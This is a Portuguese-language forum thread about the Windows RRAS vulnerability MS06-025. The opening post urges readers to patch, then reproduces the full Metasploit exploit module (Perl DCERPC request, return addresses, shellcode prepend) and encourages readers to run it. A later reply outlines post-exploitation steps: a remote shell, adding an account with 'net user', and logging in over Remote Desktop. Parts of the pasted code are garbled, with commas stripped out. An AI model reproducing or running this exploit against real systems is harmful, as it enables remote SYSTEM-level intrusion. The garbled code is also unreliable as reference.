• Revista PROGRAMAR: Já está disponível a edição #53 da revista programar. Faz já o download aqui!

teckV

Exploit RAS - IMPORTANTE

7 mensagens neste tópico

anda um exploit do RAS a bombar... ontem fui alvo desse ataque numa maquina que não tinha as ultimas actualizações...

esse exploit permite explorar uma vulnerabilidade no "Routing and Remote Access Service" permitindo ao atacante executar codigo remoto com previlegios de SYSTEM e alterar confifuraçãos de serviços RAS e dial-Up connection... é problemático porque está ligado com o "Dial-Up Connections"...

veifiquei o ataque quando vi o label de "Found new harware - RAS network adapter"... pelo que percebi estavam a adicionar uma ligação por RAS,"deliguei logo a linha e não econtrei grande coisa nos LOGs

anda ppl a efectuar Scans em busca dessa vulnerabilidade

É IMPERATIVO QUE ACTUALIZEM O WINDOWS COM A MÁXIMA URGENCIA

patch para o XP SP2

http://www.microsoft.com/downloads/details.aspx?familyid=74838e2b-bd5f-4584-81f1-3250e6b69728

links para actualizações/correcções para outras versões/configurações Windows

mais info sobre este EXPLOIT

http://metasploit.com/projects/Framework/exploits.html#rras_ms06_025'>http://metasploit.com/projects/Framework/exploits.html#rras_ms06_025

http://www.securityfocus.com/bid/18325/discuss

o código do exploit... porque acredito na informação.. o exploit já está disponivel publicamente e actualizado na MetaSploit Framework

aproveitem para perceber o processo de "exploits" e como funcionam... a melhor forma de o executar é recorrendo à framework MetaSploit

The Metasploit Framework is an advanced open-source platform for developingtestingand using exploit code. This project initially started off as a portable network game and has evolved into a powerful tool for penetration testingexploit developmentand vulnerability research.

The Framework was written in the Perl scripting language and includes various components written in Cassemblerand Python. The widespread support for the Perl language allows the Framework to run on almost any Unix-like system under its default configuration. A customized Cygwin environment is provided for users of Windows-based operating systems. The project core is dual-licensed under the GPLv2 and Perl Artistic Licensesallowing it to be used in both open-source and commercial projects.

http://metasploit.com/projects/Framework/

##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing licensethis file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::rras_ms06_025;
use base "Msf::Exploit";
use strict;

use Pex::DCERPC;
use Pex::NDR;

my $advanced = {
'FragSize'    => [ 256'The DCERPC fragment size' ],
'BindEvasion' => [ 0,   'IDS Evasion of the Bind request' ],
'DirectSMB'   => [ 0,   'Use direct SMB (445/tcp)' ],
  };

my $info = {
'Name'    => 'Microsoft RRAS MSO6-025 Stack Overflow',
'Version' => '$Revision: 1.1 $',
'Authors' =>
[
  'Nicolas Pouvesle <nicolas.pouvesle [at] gmail.com>',
  'H D Moore <hdm [at] metasploit.com>'
],

'Arch' => ['x86'],
'OS'   => [ 'win32''win2000''winxp' ],
'Priv' => 1,

'AutoOpts' => { 'EXITFUNC' => 'thread' },
'UserOpts' => {
  'RHOST' => [ 1'ADDR''The target address' ],

  # SMB connection options
  'SMBUSER' => [ 0'DATA''The SMB username to connect with''' ],
  'SMBPASS' => [ 0'DATA''The password for specified SMB username',''],
  'SMBDOM'  => [ 0'DATA''The domain for specified SMB username''' ],
  'SMBPIPE' => [ 1'DATA''The pipe name to use (2000=ROUTER,
XP=SRVSVC)''ROUTER' ],
   },

'Payload' => {
  'Space'    => 1104,
  'BadChars' => "\x00",
  'Keys'     => ['+ws2ord'],

  # sub esp4097 + inc esp makes stack happy
  'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44",
   },

'Description' => Pex::Text::Freeform(
  qq{
        This module exploits a stack overflow in the Windows Routing and
Remote
  Access Service. Since the service is hosted inside svchost.exea failed
  exploit attempt can cause other system services to fail as well. A valid
  username and password is required to exploit this flaw on Windows 2000.
  When attacking XP SP1the SMBPIPE option needs to be set to 'SRVSVC'.
}
   ),

'Refs' =>
   [
  [ 'BID''18325' ],
  [ 'CVE''2006-2370' ],
  [ 'OSVDB''26437' ],
  [ 'MSB''MS06-025' ]
   ],

'DefaultTarget' => 0,
'Targets'       =>
   [
  [ 'Automatic' ],
  [ 'Windows 2000',   0x7571c1e4 ]# pop/pop/ret
  [ 'Windows XP SP1'# pop/pop/ret
   ],

'Keys' => ['rras'],

'DisclosureDate' => 'Jun 13 2006',
  };

sub new {
my ($class) = @_;
my $self    = $class->SUPER::new( { 'Info' => $info'Advanced' =>
$advanced }@_ );
return ($self);
}

sub Exploit {
my ($self)      = @_;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx  = $self->GetVar('TARGET');
my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
my $target      = $self->Targets->[$target_idx];

my $FragSize = $self->GetVar('FragSize') || 256;
my $target   = $self->Targets->[$target_idx];

my ( $res$rpc );

if ( !$self->InitNops(128) ) {
  $self->PrintLine("[*] Failed to initialize the nop module.");
  return;
}

my $pipe    = "\\" . $self->GetVar("SMBPIPE");
my $uuid    = '20610036-fa22-11cf-9823-00a0c911e5df';
my $version = '1.0';

my $handle =
   Pex::DCERPC::build_handle( $uuid$version'ncacn_np'$target_host,
  $pipe );

my $dce = Pex::DCERPC->new(
  'handle'      => $handle,
  'username'    => $self->GetVar('SMBUSER'),
  'password'    => $self->GetVar('SMBPASS'),
  'domain'      => $self->GetVar('SMBDOM'),
  'fragsize'    => $self->GetVar('FragSize'),
  'bindevasion' => $self->GetVar('BindEvasion'),
  'directsmb'   => $self->GetVar('DirectSMB'),
   );

if ( !$dce ) {
  $self->PrintLine("[*] Could not bind to $handle");
  return;
}

my $smb = $dce->{'_handles'}{$handle}{'connection'};
if ( $target->[0] =~ /Auto/ ) {
  if ( $smb->PeerNativeOS eq 'Windows 5.0' ) {
   $target = $self->Targets->[1];
   $self->PrintLine('[*] Detected a Windows 2000 target...');
  }
  elsif ( $smb->PeerNativeOS eq 'Windows 5.1' ) {
   $target = $self->Targets->[2];
   $self->PrintLine('[*] Detected a Windows XP target...');
  }
  else {
   $self->PrintLine( '[*] No target available : ' . $smb->PeerNativeOS()
);
   return;
  }
}

my $pattern = '';

if ($target->[0] =~ /Windows 2000/) {

  $pattern =
    pack( 'V'1 ) .
    pack( 'V'$target->[1] ) .
    "\xe9\xb7\xfb\xff\xff" ;

} elsif( $target->[0] =~ /Windows XP/) {

  $pattern =
    pack( 'V'1 ) .
    pack( 'V'$target->[1] ) .
    $shellcode;

} else {
  self->PrintLine( '[*] No target available...');
  return;
}

# need to produce an exception
my $request = $pattern . Pex::Text::AlphaNumText(0x4000 -
length($pattern));

my $len = length ($request);

my $stub =
   Pex::NDR::Long( int( 0x20000 ) )
   . Pex::NDR::Long( int( $len ) )
   . $request
   . Pex::NDR::Long( int( $len ) );

$self->PrintLine("[*] Sending request...");
my @response = $dce->request( $handle$stub );
if (@response) {
  $self->PrintLine('[*] RPC server responded with:');
  foreach my $line (@response) {
   $self->PrintLine( '[*] ' . $line );
  }
  $self->PrintLine('[*] This probably means that the system is patched');
}
return;
}

1;

teckV

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Nao percebo uma coisa, ao testarmos o exploit usando o Metasploit Framework, estaremos a testar em nós mesmos certo ? :|

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites
Exploiting this issue on Microsoft Windows XP SP2 or Windows Server 2003 requires valid login credentials. Anonymous attacks are possible with Windows 2000 and Windows XP versions prior to SP2.

Quem tem Windows XP SP2 em princípio não se tem de preocupar, desde que não tenham dado o vosso username e password a ninguém, mas convém sempre instalar o patch, nunca se sabe..  ;)

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

respondendo aoa isto

Nao percebo uma coisa, ao testarmos o exploit usando o Metasploit Framework, estaremos a testar em nós mesmos certo ? :|

claro que não.. que sentido fazia ter exploits que só funcionamvam na propria maquina? vê o resto do artigo para perceberes...

Quem tem Windows XP SP2 em princípio não se tem de preocupar, desde que não tenham dado o vosso username e password a ninguém, mas convém sempre instalar o patch, nunca se sabe.. 

cuidado com essas afirmações... todos sabemos o que quer dizer "credenciais validas"... a tua dica está a colocar os utilizadores em grande perigo.. .e apenas porque não entendes nada de segurança...

então só se consegue ter um Username e password se alguem vos der?? vamos voltar aquela cena ridicula de que a segurança é uma invenção??

um ataque é um processo complexo e envolve adquirir credenciais válidas... apelo a que tenham cuidado com estas afirmações pois estão a induzir pessoas a erro... e sinceramente não entendo o objectivo de desvalorizar a segurança.. fogo que cena... sabes quantos exploits há que te dão acesso?? sabes o que é preciso para depois de teres uma remote shell criares um acesso valido???

visto que não sabes eu digo-te.. basta o comando...

#net user novouser /ADD

que cena... não precisam provar nada... não há nada a provar... e caraças pá... é sempre os mesmos.. afirmar coisas ERRADAS é muito mau para a pontuação, se é que me percebes... mais vale estar calado do que pontuar negativamente

neste site estão screen shots de ataques com sucesso e mostram as varias fases...

http://www.metasploit.com/projects/Framework/screenshots.html

saliento esta imagem onde depois de se explorar uma vulnerabilidade se consegue iniciar uma Shell especifica do metasploit... na shell/consola cria-se um user novo sem password.. depois pelo Remote Desktop loga-se na maquina... o resto é com voçes..

v23_vnc_03_big.jpg

imagem da consola onde se defini o alvo

v23_web_03_big.jpg

quem não percebe de segurança não atrapalhe o trabalho dos outros... please.. não é por nada.. apenas por questões técnicas

teckV

horus herakty

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Bom post TeckV :cheesygrin:

Já tive a testar aqui pelos pcs de casa e tão todos protegidos desse exploit :P Mas fiquei surpreendido, eu que sou um leigo em segurança, a quantidade de exploits que podem existir para programas especificos ;)

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites
Já tive a testar aqui pelos pcs de casa e tão todos protegidos desse exploit  Mas fiquei surpreendido, eu que sou um leigo em segurança, a quantidade de exploits que podem existir para programas especificos

fico muito feliz que o ppl começe a ter consciencia disso... é muito importante para que não acontemçam problemas maiores

o objectivo deste POST não foi este ataque especifico... foi mostrar um QUENTE (os tempos de actulização das empresas são grandes e podem encontrar muitas maquinas empresariais vulneraveis) para que o ppl entendesse de uma vez por todas que há varios processos de ataque.. .o CRAKING está em alta... é preciso cuidado usando METODOS e PRATICAS seguras... pela comunidade...

como já disse a segurança é de responsabilidade de todos... não é que eu... pois.. .voçes sabem... mas uma coisa é uma coisa e outra coisa é permitir que gajos sem qualquer ideal, motivação filosófica/espiritual e finalidade "humana" espalhem lixo e destruam os srviços que todos usamos e gostamos...

resistir é uma coisa... anarquia e chaos é outra... e estas cenas permitem a que gajos revoltados com isto e aquilo lamçem a destuição só por destruição...

e poque é que eu me preocupo que as pessoas em casa não sejam atacadas? porque isso vai dar ARMAS, BASES DE APOIO e RAMPAS DE LANÇAMENTO para ataques maiores e mais destuitivos... é por isto que considero um problema colectivo

a segurança está muito QUENTE... as técnicas estão muito APURADAS e EVOLUIDAS... a sério... tenham todos os cuidados porque como se diz no "Predador" - merdas aconteçem

teckV

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Boas, alguem sabeme dizer ond esta localixado a pasta dos exploits e modulos do metasploit 3.2 windows, eu ate ia para o linux que seria mais rapido, mas ja que estou no windows agora, acabava por tentar por aqui

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Crie uma conta ou ligue-se para comentar

Só membros podem comentar

Criar nova conta

Registe para ter uma conta na nossa comunidade. É fácil!


Registar nova conta

Entra

Já tem conta? Inicie sessão aqui.


Entrar Agora